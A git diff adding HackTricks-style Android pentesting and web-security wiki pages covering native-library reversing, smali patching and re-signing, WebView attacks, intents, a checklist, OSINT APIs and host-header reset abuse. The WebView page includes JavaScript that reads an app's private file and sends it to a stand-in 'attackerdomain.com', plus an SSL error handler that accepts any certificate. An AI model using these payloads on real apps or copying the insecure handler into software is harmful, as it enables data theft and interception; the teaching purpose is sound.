+2. This time, if you expand the Resources tab, you will see that this APK has a `lib/` directory. The native libraries for this APK are in the default CPU paths. 
+3. Now we need to identify any declared native methods. In jadx, search and list all declared native methods. There should be two.
+4. Around the declared native method, see if there is anywhere that a native library is loaded. This will provide guidance of what native library to look in for the function to be implemented.
+5. Extract the native library from the APK by creating a new dir and copying the APK into that folder. Then run the command `unzip Mediacode.APK`. You will see all of the files extracted from APK, which includes the `lib/` directory.
+6. Select the architecture of the native library you’d like to analyze.
+7. Start ghidra by running `ghidraRun`. This will open Ghidra.
+8. To open the native library for analysis, select “New Project”, “Non-Shared Project”, select a path to save the project to and give it a name. This creates a project that you can then load binary files into.
+9. Once you’ve created your project, select the dragon icon to open the Code Browser. The go to “File” &gt; “Import File” to load the native library into the tool. You can leave all defaults.
+10. You will see the following screen. Select “Analyze”. 
+11. Using the linking information above, identify the function in the native library that is executed when the Java-declared native method is called.
+
+![Loading file into Ghidra Code Browser](https://maddiestone.github.io/AndroidAppRE/images/loadingIntoGhidra.png)
+
+![Screenshot of Mediacode open in jadx](https://maddiestone.github.io/AndroidAppRE/images/Mediacode.InJadx.png)
+
+**Solution**
+
+### Reversing Android Native Libraries Code - JNIEnv <a id="reversing-android-native-libraries-code---jnienv"></a>
+
+When beginning to reverse engineer Android native libraries, one of the things I didn’t know I needed to know, was about `JNIEnv`. `JNIEnv` is a struct of function pointers to [JNI Functions](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/functions.html). Every JNI function in Android native libraries, takes `JNIEnv*` as the first argument.
+
+From the Android [JNI Tips](https://developer.android.com/training/articles/perf-jni) documentation:
+
+> The C declarations of JNIEnv and JavaVM are different from the C++ declarations. The “jni.h” include file provides different typedefs depending on whether it’s included into C or C++. For this reason it’s a bad idea to include JNIEnv arguments in header files included by both languages. \(Put another way: if your header file requires \#ifdef \_\_cplusplus, you may have to do some extra work if anything in that header refers to JNIEnv.\)
+
+Here are some commonly used functions \(and their offsets in JNIEnv\):
+
+* JNIEnv + 0x18: jclass \(\*FindClass\)\(JNIEnv_, const char_\);
+* JNIEnv + 0x34: jint \(\*Throw\)\(JNIEnv\*, jthrowable\);
+* JNIEnv + 0x70: jobject \(\*NewObject\)\(JNIEnv\*, jclass, jmethodID, …\);
+* JNIEnv + 0x84: jobject \(\*NewObject\)\(JNIEnv\*, jclass, jmethodID, …\);
+* JNIEnv + 0x28C: jstring \(\*NewString\)\(JNIEnv_, const jchar_, jsize\);
+* JNIEnv + 0x35C: jint \(\*RegisterNatives\)\(JNIEnv_, jclass, const JNINativeMethod_, jint\);
+
+When analyzing Android native libraries, the presence of JNIEnv means that:
+
+1. For JNI native functions, the arguments will be shifted by 2. The first argument is always JNIEnv\*. The second argument will be the object that the function should be run on. For static native methods \(they have the static keyword in the Java declaration\) this will be NULL.
+2. You will often see indirect branches in the disassembly because the code is adding the offset to the JNIEnv\* pointer, dereferencing to get the function pointer at that location, then branching to the function.
+
+Here is a [spreadsheet](https://docs.google.com/spreadsheets/d/1yqjFaY7mqyVIDs5jNjGLT-G8pUaRATzHWGFUgpdJRq8/edit?usp=sharing) of the C-implementation of the JNIEnv struct to know what function pointers are at the different offsets.
+
+In practice, in the disassembly this shows as many different branches to indirect addresses rather than the direct function call. The image below shows one of these indirect function calls. The highlighted line in the disassembly shows a `blx r3`. As reversers, we need to figure out what r3 is. It’s not shown in the screenshot, but at the beginning of this function, `r0` was moved into `r5`. Therefore, `r5` is `JNIEnv*`. On line 0x12498 we see `r3 = [r5]`. Now `r3` is `JNIEnv` \(no \*\).
+
+On line 0x1249e, we add 0x18 to `r3` and dereference it. This means that `r3` now equals whatever function pointer is at offset 0x18 in JNIEnv. We can find out by looking at the spreadsheet. `[JNIEnv + 0x18] = Pointer to the FindClass method`
+
+Therefore `blx r3` on line 0x124a4 is calling `FindClass`. We can look up information about `FindClass` \(and all the other functions in JNIEnv\) in the JNIFunctions documentation [here](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/functions.html).
+
+![Screenshot of Disassembly Calling a function from JNIEnv](https://maddiestone.github.io/AndroidAppRE/images/JNIcall.png)
+
+Thankfully, there’s a way to get the JNI function without doing all of this manually! In both the Ghidra and IDA Pro decompilers you can re-type the first argument in JNI functions to `JNIEnv *` type and it will automatically identify the JNI Functions being called. In IDA Pro, this work out of the box. In Ghidra, you have to load the JNI types \(either the jni.h file or a Ghidra Data Types archive of the jni.h file\) first. For ease, we will load the JNI types from the Ghidra Data Types archive \(gdt\) produced by Ayrx and available [here](https://github.com/Ayrx/JNIAnalyzer/blob/master/JNIAnalyzer/data/jni_all.gdt). For ease, this file is available in the VM at `~/jni_all.gdt`.
+
+To load it for use in Ghidra, in the Data Type Manager Window, click on the down arrow in the right-hand corner and select “Open File Archive”.
+
+![Screenshot of Open File Archive Menu](https://maddiestone.github.io/AndroidAppRE/images/OpenArchive.png)
+
+Then select `jni_all.gdt` file to load. Once it’s loaded, you should see jni\_all in the Data Type Manager List as shown below.
+
+![Screenshot of jni\_all Loaded in Data Type Manager](https://maddiestone.github.io/AndroidAppRE/images/LoadedInDataTypeManager.png)
+
+Once this is loaded in Ghidra, you can then select any argument types in the decompiler and select “Retype Variable”. Set the new type to JNIEnv \*. This will cause the decompiler to now show the names of the JNIFunctions called rather than the offsets from the pointer.
+
+![Screenshot of JNI Function names after the argument was Re-Typed to JNIEnv\* ](https://maddiestone.github.io/AndroidAppRE/images/RetypedToJNIEnv.png)
+
+#### Exercise \#6 - Find and Reverse the Native Function <a id="exercise-6---find-and-reverse-the-native-function"></a>
+
+We are going to point all of our previous skills together: identifying starting points for RE, reversing DEX, and reversing native code to analyze an application that may have moved its harmful behaviors in native code. The sample is `~/samples/HDWallpaper.apk`.
+
+**Goal**
+
+The goal of this exercise is to put all of our Android reversing skills together to analyze an app as a whole: its DEX and native code.
+
+**Exercise Context**
+
+You are a malware analyst for Android applications. You are concerned that this sample maybe doing premium SMS fraud, meaning that it sends an SMS to a premium phone number without disclosure & user consent. In order to flag as malware, you need to determine if the Android application is:
+
+1. Sending an SMS message, and
+2. That SMS message is going to a premium number, and
+3. If there is an obvious disclosure, and
+4. If the SMS message is only sent to the premium number after user consent.
+
+**Instructions**
+
+Go on and reverse!
+
+**Solution**
+
diff --git a/mobile-apps-pentesting/android-app-pentesting/smali-changes.md b/mobile-apps-pentesting/android-app-pentesting/smali-changes.md
new file mode 100644
index 00000000..ee531a09
--- /dev/null
+++ b/mobile-apps-pentesting/android-app-pentesting/smali-changes.md
@@ -0,0 +1,180 @@
+# Smali - Decompiling/\[Modifying\]/Compiling
+
+Sometimes it is interesting to modify the application code to access hidden information for you \(maybe well obfuscated passwords or flags\). Then, it could be interesting to decompile the apk, modify the code and recompile it.
+
+**Opcodes reference:** [http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html](http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html)
+
+## Decompile the APK
+
+Using APKTool you can access to the **smali code and resources**:
+
+```text
+apktool d APP.apk
+```
+
+If **apktool** gives you any error, try[ installing the **latest version**](https://ibotpeaches.github.io/Apktool/install/)
+
+Some **interesting files you should look are**: 
+
+* _res/values/strings.xml_ \(and all xmls inside res/values/\*\)
+* _AndroidManifest.xml_
+* Any file with extension _.sqlite_ or _.db_
+
+If `apktool` has **problems decoding the application** take a look to [https://ibotpeaches.github.io/Apktool/documentation/\#framework-files](https://ibotpeaches.github.io/Apktool/documentation/#framework-files) or try using the argument **`-r`** \(Do not decode resources\). Then, if the problem was in a resource and not in the source code, you won't have the problem \(you won't also decompile the resources\).
+
+## Change smali code
+
+You can **change** **instructions**, change the **value** of some variables or **add** new instructions. I change the Smali code using [**VisualCode**](https://code.visualstudio.com/), you then download the plugin for the **smali extension** and the editor will tell you if any **instruction is incorrect**.  
+Some **examples** can be found here:
+
+* [Smali changes examples](smali-changes.md)
+* [Google CTF 2018 - Shall We Play a Game?](google-ctf-2018-shall-we-play-a-game.md)
+
+Or you can [**check below some Smali changes explained**](smali-changes.md#modifying-smali).
+
+## Recompile the APK
+
+After modifying the code you can **recompile** the code using:
+
+```bash
+apktool b . #In the folder generated when you decompiled the application
+```
+
+It will **compile** the new APK **inside** the _**dist**_ folder.
+
+If **apktool** throws an **error**, try[ installing the **latest version**](https://ibotpeaches.github.io/Apktool/install/)\*\*\*\*
+
+### **Sing the new APK**
+
+Then, you need to **generate a key** \(you will be asked for a password and for some information that you can fill randomly\):
+
+```bash
+keytool -genkey -v -keystore key.jks -keyalg RSA -keysize 2048 -validity 10000 -alias <your-alias>
+```
+
+Finally, **sign** the new APK:
+
+```bash
+jarsigner -keystore key.jks path/to/dist/* <your-alias>
+```
+
+### Optimize new application
+
+**zipalign** is an archive alignment tool that provides important optimisation to Android application \(APK\) files. [More information here](https://developer.android.com/studio/command-line/zipalign).
+
+```bash
+zipalign [-f] [-v] <alignment> infile.apk outfile.apk
+zipalign -v 4 infile.apk
+```
+
+### **Sign the new APK \(again?\)**
+
+If you **prefer** to use ****[**apksigner**](https://developer.android.com/studio/command-line/apksigner) **instead of jarsigner,** you should sing the apk **after applying** the optimization with **zipaling**. BUT NOTICE THAT **YOU ONLY HAVE TO SIGN THE APPLCIATION ONCE** WITH jarsigner \(before zipalign\) OR WITH aspsigner\(after zipaling\).
+
+```bash
+apksigner sign --ks key.jks ./dist/mycompiled.apk
+```
+
+## Modifying Smali
+
+For the following Hello World Java code:
+
+```text
+public static void printHelloWorld() {
+	System.out.println("Hello World")
+}
+```
+
+The Smali code would be:
+
+```text
+.method public static printHelloWorld()V
+	.registers 2
+	sget-object v0, Ljava/lang/System;->out:Ljava/io/PrintStream;
+	const-string v1, "Hello World"
+	invoke-virtual {v0,v1}, Ljava/io/PrintStream;->println(Ljava/lang/String;)V
+	return-void
+.end method
+
+```
+
+The Smali instruction set is available [here](https://source.android.com/devices/tech/dalvik/dalvik-bytecode#instructions).
+
+### Light Changes
+
+### Modify initial values of a variable inside a function
+
+Some variables are defined at the beginning of the function using the opcode _const_, you can modify its values, or you can define new ones:
+
+```text
+#Number
+const v9, 0xf4240
+const/4 v8, 0x1
+#Strings
+const-string v5, "wins"
+```
+
+### Basic Operations
+
+```text
+#Math
+add-int/lit8 v0, v2, 0x1 #v2 + 0x1 and save it in v0
+mul-int v0,v2,0x2 #v2*0x2 and save in v0
+
+#Move the value of one object into another
+move v1,v2
+
+#Condtions
+if-ge #Greater or equals
+if-le #Less or equals
+if-eq #Equals
+
+#Get/Save attributes of an object
+iget v0, p0, Lcom/google/ctf/shallweplayagame/GameActivity;->o:I #Save this.o inside v0
+iput v0, p0, Lcom/google/ctf/shallweplayagame/GameActivity;->o:I #Save v0 inside this.o
+
+#goto
+:goto_6 #Declare this where you want to start a loop
+if-ne v0, v9, :goto_6 #If not equals, go to: :goto_6
+goto :goto_6 #Always go to: :goto_6
+```
+
+### Bigger Changes
+
+### Logging
+
+```text
+#Log win: <number>
+iget v5, p0, Lcom/google/ctf/shallweplayagame/GameActivity;->o:I #Get this.o inside v5
+invoke-static {v5}, Ljava/lang/String;->valueOf(I)Ljava/lang/String; #Transform number to String
+move-result-object v1 #Move to v1
+const-string v5, "wins" #Save "win" inside v5
+invoke-static {v5, v1}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I #Logging "Wins: <num>"
+```
+
+Recommendations:
+
+* If you are going to use declared variables inside the function \(declared v0,v1,v2...\) put these lines between the _.local &lt;number&gt;_ and the declarations of the variables \(_const v0, 0x1_\)
+* If you want to put the logging code in the middle of the code of a function:
+  * Add 2 to the number of declared variables: Ex: from _.locals 10_ to _.locals 12_
+  * The new variables should be the next numbers of the already declared variables \(in this example should be _v10_ and _v11_, remember that it starts in v0\).
+  * Change the code of the logging function and use _v10_ and _v11_ instead of _v5_ and _v1_.
+
+### Toasting
+
+Remember to add 3 to the number of _.locals_ at the begging of the function.
+
+This code is prepared to be inserted in the **middle of a function** \(**change** the number of the **variables** as necessary\). It will take the **value of this.o**, **transform** it to **String** and them **make** a **toast** with its value.
+
+```text
+const/4 v10, 0x1
+const/4 v11, 0x1
+const/4 v12, 0x1
+iget v10, p0, Lcom/google/ctf/shallweplayagame/GameActivity;->o:I
+invoke-static {v10}, Ljava/lang/String;->valueOf(I)Ljava/lang/String;
+move-result-object v11
+invoke-static {p0, v11, v12}, Landroid/widget/Toast;->makeText(Landroid/content/Context;Ljava/lang/CharSequence;I)Landroid/widget/Toast;
+move-result-object v12
+invoke-virtual {v12}, Landroid/widget/Toast;->show()V
+```
+
diff --git a/mobile-apps-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md b/mobile-apps-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md
new file mode 100644
index 00000000..0f65d4e0
--- /dev/null
+++ b/mobile-apps-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md
@@ -0,0 +1,11 @@
+# Spoofing your location in Play Store
+
+**Information copied from** [**https://manifestsecurity.com/android-application-security-part-23/**](https://manifestsecurity.com/android-application-security-part-23/)\*\*\*\*
+
+Many a times you have seen that application which you want to assess is only allowed in selected countries, so in that case you won’t be able to install that application on you android device. But if you can spoof your location to that country in which the application is allowed then you can get access to that application. Below is the procedure of the same.
+
+* First install **Hotspot Shield Free VPN Proxy** from Google Play Store. ![](https://i.imgur.com/0XrmuKY.png)
+* Now connect using it and choose your required country. ![](https://i.imgur.com/Z0WHrZX.png)
+* Now go to **Settings** &gt;&gt; **Apps** &gt;&gt; **Google Play Store** and then tap on **Force Stop** and then on **Clear Data**. ![](https://i.imgur.com/sjFrr67.png)
+* Open up **Google Play Store** and now you will be able to search and install the application which is only available in that country. ![](https://i.imgur.com/zfdhCBI.png)
+
diff --git a/mobile-apps-pentesting/android-app-pentesting/webview-attacks.md b/mobile-apps-pentesting/android-app-pentesting/webview-attacks.md
new file mode 100644
index 00000000..a352ea66
--- /dev/null
+++ b/mobile-apps-pentesting/android-app-pentesting/webview-attacks.md
@@ -0,0 +1,77 @@
+# Webview Attacks
+
+## Javascript Enabled
+
+_WebViews_ have _Javascript_ disabled by default. The method [_setJavaScriptEnabled\(\)_](https://developer.android.com/reference/android/webkit/WebSettings.html#setJavaScriptEnabled%28boolean%29) is available for explicitly enabling or disabling it.
+
+## File Access
+
+_WebView_ file access is enabled by default. Since API 3 \(Cupcake 1.5\) the method [_setAllowFileAccess\(\)_](https://developer.android.com/reference/android/webkit/WebSettings.html#setAllowFileAccess%28boolean%29) is available for explicitly enabling or disabling it.
+
+If the application has _android.permission.READ\_EXTERNAL\_STORAGE_ it will be able to read and load files from the external storage.
+
+ The _WebView_ needs to use a File URL Scheme, e.g., `file://path/file`, to access the file.
+
+## CORS - Cross Origin Resource Sharing
+
+**If you want to**[ **learn what is CORS please read this post**](../../pentesting-web/cors-bypass.md)**.**
+
+There is a very important property called _**UniversalAccessFromFileURLs**_ **that allows SOP bypass**. This property indicates whether _Javascript_ running in the context of a file scheme can **access content from any origin**. This property is enabled by default below API 16 \(Jelly Bean 4.1.x\) and there is no way to disable it on those API levels \[[1](https://labs.integrity.pt/articles/review-android-webviews-fileaccess-attack-vectors/index.html#note1)\]. In API 16 \(Jelly Bean 4.1.x\) and afterwards the property is **disabled by default**. The method [_**setAllowUniversalAccessFromFileURLs\(\)**_](https://developer.android.com/reference/android/webkit/WebSettings.html#setAllowUniversalAccessFromFileURLs%28boolean%29) ****was also made available to explicitly **enable or disable this feature**.
+
+## Scenarios
+
+### Javascript Enabled & FileSystemAccess Disabled
+
+In this scenario an attacker is able to **inject Javascript code** inside the web page opened via **webview** by the victim. This could be done maybe via **XSS** or making the webview **load** a **malicious HTML** page stored inside the phone.  
+This **webview has Javascript enabled** but no access to the file system.
+
+In this scenario the attacker **won't be able to read local files**, but depending on the permissions of the application this **could allow an attacker to interact with the functionality of the device** \(read SMS, microphone recording etc.\) exposing the security of the application and the device itself into great risk.
+
+### Javascript Enabled & FileSystemAccess enabled
+
+The scenario is like the one mentioned previously but the **webview now have FileSystem access**.  
+An attacker could try to ex-filtrate files with javascript code like:
+
+```javascript
+var xhr = new XMLHttpRequest();
+xhr.onreadystatechange = function() {
+    if (xhr.readyState == XMLHttpRequest.DONE) {
+    window.location.replace('https://attackerdomain.com/?exfiltrated='+xhr.responseText);
+    }
+}
+xhr.open('GET', 'file:///data/data/pt.integrity.labs.webview_remote/files/sandbox_file.txt', true);
+xhr.send(null);
+```
+
+So **even with file access enabled** in the _WebView_, due to the fact that the file scheme request is considered a **Cross Origin Request** and hence **disallowed**, the attacker will **not be able to exfiltrate** files this way.
+
+Note that if the **attacker is able to control the mobile** where the vulnerable application is running, he could be able to abuse it to **make it load the internal file and see it**. In this case the CORS isn't stopping the attack because the attacker is **directly accessing the file instead of trying to access it from a different origin**. 
+
+**CORS related errors looks like this:**
+
+```javascript
+05-09 12:38:59.306 27768 27768 I chromium: [INFO:CONSOLE(20)] “Failed to load file:///data/data/pt.integrity.labs.webview_remote/files/sandbox_file.txt: Cross origin requests are only supported for protocol schemes: http, data, chrome, https.”, source: https://labs.integrity.pt/ (20)
+```
+
+### Javascript Enabled, FileSystemAccessEnabled & CORS Disabled
+
+In this scenario, using the same Javascript payload, you will finally **be able to ex-filtrate internal files.**
+
+## **SSL Error Handling**
+
+The code below instructs the WebView client to **proceed when an SSL error occur**. This means that the **application is vulnerable to MiTM attacks** as it could allow an attacker to read or modify content that is displayed to the user since any certificate would be accepted by the application.
+
+```javascript
+@Override
+public void onReceivedSslError(WebView view, SslErrorHandler handler,
+SslError error)
+{
+    handler.proceed();
+}
+```
+
+## **References**
+
+* \*\*\*\*[**https://labs.integrity.pt/articles/review-android-webviews-fileaccess-attack-vectors/index.html**](https://labs.integrity.pt/articles/review-android-webviews-fileaccess-attack-vectors/index.html)\*\*\*\*
+* \*\*\*\*[**https://pentestlab.blog/2017/02/12/android-webview-vulnerabilities/**](https://pentestlab.blog/2017/02/12/android-webview-vulnerabilities/)\*\*\*\*
+
diff --git a/mobile-apps-pentesting/android-app-pentesting/what-are-intents.md b/mobile-apps-pentesting/android-app-pentesting/what-are-intents.md
new file mode 100644
index 00000000..51197829
--- /dev/null
+++ b/mobile-apps-pentesting/android-app-pentesting/what-are-intents.md
@@ -0,0 +1,48 @@
+# What are Intents
+
+This post was copied from [https://manifestsecurity.com/android-application-security-part-14/](https://manifestsecurity.com/android-application-security-part-14/)
+
+Your mobile application can accept data from all kinds of sources. In most cases this will be an Inter Process Communication \(IPC\) mechanism. To look in to possible attacks on the same, we first need to have know about Intent. **Sit back tight, this post is going to be long**.
+
+Intent is basically a message that is passed between components \(such as Activities, Services, Broadcast Receivers, and Content Providers\). So, it is almost equivalent to parameters passed to API calls. The fundamental differences between API calls and intents’ way of invoking components are:
+
+* API calls are synchronous while intent-based invocations are asynchronous.
+* API calls are compile time binding while intent-based calls are run-time binding.
+
+Of course, Intents can be made to work exactly like API calls by using what are called explicit intents, which will be explained later. But more often than not, implicit intents are the way to go and that is what is explained here.
+
+One component that wants to invoke another has to only express its’ intent to do a job. And any other component that exists and has claimed that it can do such a job through intent-filters, is invoked by the android platform to accomplish the job. This means, both the components are not aware of each other’s existence and can still work together to give the desired result for the end-user.
+
+This invisible connection between components is achieved through the combination of intents, intent-filters and the android platform.
+
+An intent is an abstract description of an operation to be performed. It can be used with startActivity to launch an Activity, broadcastIntent to send it to any interested BroadcastReceiver components, and startService\(Intent\) or bindService\(Intent, ServiceConnection, int\) to communicate with a background Service.
+
+An Intent provides a facility for performing late runtime binding between the code in different applications. Its most significant use is in the launching of activities, where it can be thought of as the glue between activities. It is basically a passive data structure holding an abstract description of an action to be performed. The primary pieces of information in an intent are:
+
+* **action** The general action to be performed, such as ACTION_VIEW, ACTION_EDIT, ACTION\_MAIN, etc.
+* **data** The data to operate on, such as a person record in the contacts database, expressed as a Uri.
+
+To be simple Intent can be used for
+
+* To start an Activity, typically opening a user interface for an app
+* As broadcasts to inform the system and apps of changes
+* To start, stop, and communicate with a background service
+* To access data via ContentProviders
+* As callbacks to handle events
+
+Improper implementation could result in data leakage, restricted functions being called and program flow being manipulated.
+
+**What is Intent Filters ?**
+
+If an Intents is send to the Android system, it will determine suitable applications for this Intents. If several components have been registered for this type of Intents, Android offers the user the choice to open one of them.
+
+This determination is based on IntentFilters. An IntentFilters specifies the types of Intent that an activity, service, orBroadcast Receiver can respond to. An Intent Filter declares the capabilities of a component. It specifies what anactivity or service can do and what types of broadcasts a Receiver can handle. It allows the corresponding component to receive Intents of the declared type. IntentFilters are typically defined via the AndroidManifest.xml file. For BroadcastReceiver it is also possible to define them in coding. An IntentFilters is defined by its category, action and data filters. It can also contain additional metadata.
+
+If any of the component is public then it can accessed from another application installed on the same device. In Android a activity/services/content provider/broadcast receiver is public when exported is set to true but a component is also public if the **manifest specifies an Intent filter** for it. However,  
+developers can explicitly make components private \(regardless of any intent filters\)  
+by setting the “exported” attribute to false for each component in the manifest file.  
+Developers can also set the “permission” attribute to require a certain permission to access  
+each component, thereby restricting access to the component.
+
+In the upcoming posts i will try to attack activity/services/broadcast reciever/content provider from drozer console.
+
diff --git a/mobile-apps-pentesting/android-checklist.md b/mobile-apps-pentesting/android-checklist.md
new file mode 100644
index 00000000..41de0570
--- /dev/null
+++ b/mobile-apps-pentesting/android-checklist.md
@@ -0,0 +1,64 @@
+# Android APK Checklist
+
+### [Learn Android fundamentals](android-app-pentesting/#2-android-application-fundamentals)
+
+* [ ] [Basics](android-app-pentesting/#fundamentals-review)
+* [ ] [Dalvik & Smali](android-app-pentesting/#dalvik--smali)
+* [ ] [Entry points](android-app-pentesting/#application-entry-points)
+  * [ ] [Activities](android-app-pentesting/#launcher-activity)
+  * [ ] [URL Schemes](android-app-pentesting/#url-schemes)
+  * [ ] [Content Providers](android-app-pentesting/#services)
+  * [ ] [Services](android-app-pentesting/#services-1)
+  * [ ] [Broadcast Receivers](android-app-pentesting/#broadcast-receivers)
+  * [ ] [Intents](android-app-pentesting/#intents)
+  * [ ] [Intent Filter](android-app-pentesting/#intent-filter)
+* [ ] [Other components](android-app-pentesting/#other-app-components)
+* [ ] [How to use ADB](android-app-pentesting/#adb-android-debug-bridge)
+* [ ] [How to modify Smali](android-app-pentesting/#smali)
+
+### [Static Analysis](android-app-pentesting/#static-analysis)
+
+* [ ] Check for the use of [obfuscation](android-checklist.md#some-obfuscation-deobfuscation-information), checks for noting if the mobile was rooted, if an emulator is being used and anti-tampering checks. [Read this for more info](android-app-pentesting/#other-checks).
+* [ ] Sensitive applications \(like bank apps\) should check if the mobile is rooted and should actuate in consequence.
+* [ ] Search for [interesting strings](android-app-pentesting/#looking-for-interesting-info) \(passwords, URLs, API, encryption, backdoors, tokens, Bluetooth uuids...\).
+  * [ ] Special attention to [firebase ](android-app-pentesting/#firebase)APIs.
+* [ ] [Read the manifest:](android-app-pentesting/#basic-understanding-of-the-application-manifest-xml)
+  * [ ] Check if the application is in debug mode and try to "exploit" it
+  * [ ] Check if the APK allows backups
+  * [ ] Exported Activities
+  * [ ] Content Providers
+  * [ ] Exposed services
+  * [ ] Broadcast Receivers
+  * [ ] URL Schemes
+* [ ] Is the application s[aving data insecurely internally or externally](android-app-pentesting/#insecure-data-storage)?
+* [ ] Is there any [password hard coded or saved in disk](android-app-pentesting/#poorkeymanagementprocesses)? Is the app [using insecurely crypto algorithms](android-app-pentesting/#useofinsecureandordeprecatedalgorithms)?
+* [ ] All the libraries compiled using the PIE flag?
+* [ ] Don't forget that there is a bunch of[ static Android Analyzers](android-app-pentesting/#automatic-analysis) that can help you a lot during this phase.
+
+### [Dynamic Analysis](android-app-pentesting/#dynamic-analysis)
+
+* [ ] Prepare the environment \([online](android-app-pentesting/#online-dynamic-analysis), [local VM or physical](android-app-pentesting/#local-dynamic-analysis)\)
+* [ ] Is there any [unintended data leakage](android-app-pentesting/#unintended-data-leakage) \(logging, copy/paste, crash logs\)?
+* [ ] [Confidential information being saved in SQLite dbs](android-app-pentesting/#sqlite-dbs)?
+* [ ] [Exploitable exposed Activities](android-app-pentesting/#exploiting-exported-activities-authorisation-bypass)?
+* [ ] [Exploitable Content Providers](android-app-pentesting/#exploiting-content-providers-accessing-and-manipulating-sensitive-information)?
+* [ ] [Exploitable exposed Services](android-app-pentesting/#exploiting-services)?
+* [ ] [Exploitable Broadcast Receivers](android-app-pentesting/#exploiting-broadcast-receivers)?
+* [ ] Is the application [transmitting information in clear text/using weak algorithms](android-app-pentesting/#insufficient-transport-layer-protection)? is a MitM possible?
+* [ ] [Inspect HTTP/HTTPS traffic](android-app-pentesting/#inspecting-http-traffic)
+  * [ ] This one is really important, because if you can capture the HTTP traffic you can search for common Web vulnerabilities \(Hacktricks has a lot of information about Web vulns\).
+* [ ] Check for possible [Android Client Side Injections](android-app-pentesting/#android-client-side-injections-and-others) \(probably some static code analysis will help here\)
+* [ ] [Frida](android-app-pentesting/#frida): Just Frida, use it to obtain interesting dynamic data from the application \(maybe some passwords...\)
+
+### Some obfuscation/Deobfuscation information
+
+* [ ] [Read here](android-app-pentesting/#obfuscating-deobfuscating-code)
+
+
+
+If you want to **know** about my **latest modifications**/**additions or you have any suggestion for HackTricks or PEASS**, **join the** [**PEASS & HackTricks telegram group here**](https://t.me/peass)**.**
+
+![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67.png)
+
+​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
+
diff --git a/online-platforms-with-api.md b/online-platforms-with-api.md
new file mode 100644
index 00000000..3c2d5167
--- /dev/null
+++ b/online-platforms-with-api.md
@@ -0,0 +1,118 @@
+# Online Platforms with API
+
+### [ProjectHoneypot](https://www.projecthoneypot.org/)
+
+You can ask if an IP is related to suspicious/malicious activities. Completely free.
+
+### \*\*\*\*[**BotScout**](http://botscout.com/api.htm)\*\*\*\*
+
+Check if the IP address is related to a bot that register accounts. It can also check usernames and emails. Initially free.
+
+### [Hunter](https://hunter.io/)
+
+Find and verify emails.  
+Some free API requests free, for more you need to pay.  
+Commercial?
+
+### [AlientVault](https://otx.alienvault.com/api)
+
+Find Malicious activities related to IPs and Domains. Free.
+
+### [Clearbit](https://dashboard.clearbit.com/)
+
+Find related personal data to a email \(profiles on other platforms\), domain \(basic company info ,mails and people working\) and companies \(get company info from mail\).  
+You need to pay to access all the possibilities.  
+Commercial?
+
+### [BuiltWith](https://builtwith.com/)
+
+Technologies used by webs. Expensive...  
+Commercial?
+
+### [Fraudguard](https://fraudguard.io/)
+
+Check if a host \(domain or IP\) is related with suspicious/malicious activities. Have some free API access.  
+Commercial?
+
+### [FortiGuard](https://fortiguard.com/)
+
+Check if a host \(domain or IP\) is related with suspicious/malicious activities. Have some free API access.
+
+### [SpamCop](https://www.spamcop.net/)
+
+Indicates if host is related to spam activity. Have some free API access.
+
+### [mywot](https://www.mywot.com/)
+
+Based on opinions and other metrics get if a domain is related with suspicious/malicious information.
+
+### [ipinfo](https://ipinfo.io/)
+
+Obtains basic info from an IP address. You can test up to 100K/month.
+
+### [securitytrails](https://securitytrails.com/app/account)
+
+This platform give information about domains and IP addresses like domains inside an IP or inside a domain server, domains owned by an email \(find related domains\), IP history of domains \(find the host behind CloudFlare\), all domains using a nameserver....  
+You have some free access.
+
+### [fullcontact](https://www.fullcontact.com/)
+
+Allows to search by email, domain or company name and retrieve "personal" information related. It can also verify emails. There is some free access.
+
+### [RiskIQ](https://www.spiderfoot.net/documentation/)
+
+A lot of information from domains and IPs even in the free/community version.
+
+### [\_IntelligenceX](https://intelx.io/)
+
+Search Domains, IPs and emails and get info from dumps. Have some free access.
+
+### [IBM X-Force Exchange](https://exchange.xforce.ibmcloud.com/)
+
+Search by IP and gather information related to suspicions activities. There is some free access.
+
+### [Greynoise](https://viz.greynoise.io/)
+
+Search by IP or IP range and get information about IPs scanning the Internet. 15 days free access.
+
+### [Shodan](https://www.shodan.io/)
+
+Get scan information of an IP address. Have some free api access.
+
+### [Censys](https://censys.io/)
+
+Very similar to shodan
+
+### [buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/)
+
+Find open S3 buckets searching by keyword.
+
+### [Dehashed](https://www.dehashed.com/data)
+
+Find leaked credentials of emails and even domains  
+Commercial?
+
+### [psbdmp](https://psbdmp.ws/)
+
+Search pastebins where a email appeared. Commercial?
+
+### [emailrep.io](https://emailrep.io/key)
+
+Get reputation of a mail. Commercial?
+
+### [ghostproject](https://ghostproject.fr/)
+
+Get passwords from leaked emails. Commercial?
+
+### [Binaryedge](https://www.binaryedge.io/)
+
+Obtain interesting info from IPs
+
+### [haveibeenpwned](https://haveibeenpwned.com/)
+
+Search by domain and email and get if it was pwned and passwords. Commercial?
+
+[https://dnsdumpster.com/](https://dnsdumpster.com/)\(in a commercial tool?\)
+
+[https://www.netcraft.com/](https://www.netcraft.com/) \(in a commercial tool?\)
+
diff --git a/other-web-tricks.md b/other-web-tricks.md
new file mode 100644
index 00000000..3feab7bd
--- /dev/null
+++ b/other-web-tricks.md
@@ -0,0 +1,25 @@
+# Other Web Tricks
+
+### Host header
+
+Several times the back-end trust the H**ost header** to perform some actions. For example, it could use its value as the **domain to send a password reset**. So when you receive an email with a link to reset your password, the domain being used is the one you put in the Host header.Then, you can request the password reset of other users and change the domain to one controlled by you to steal their password reset codes. [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2). 
+
+### Session booleans
+
+Some times when you complete some verification correctly the back-end will **just add a boolean with the value "True" to a security attribute your session**. Then, a different endpoint will know if you successfully passed that check.  
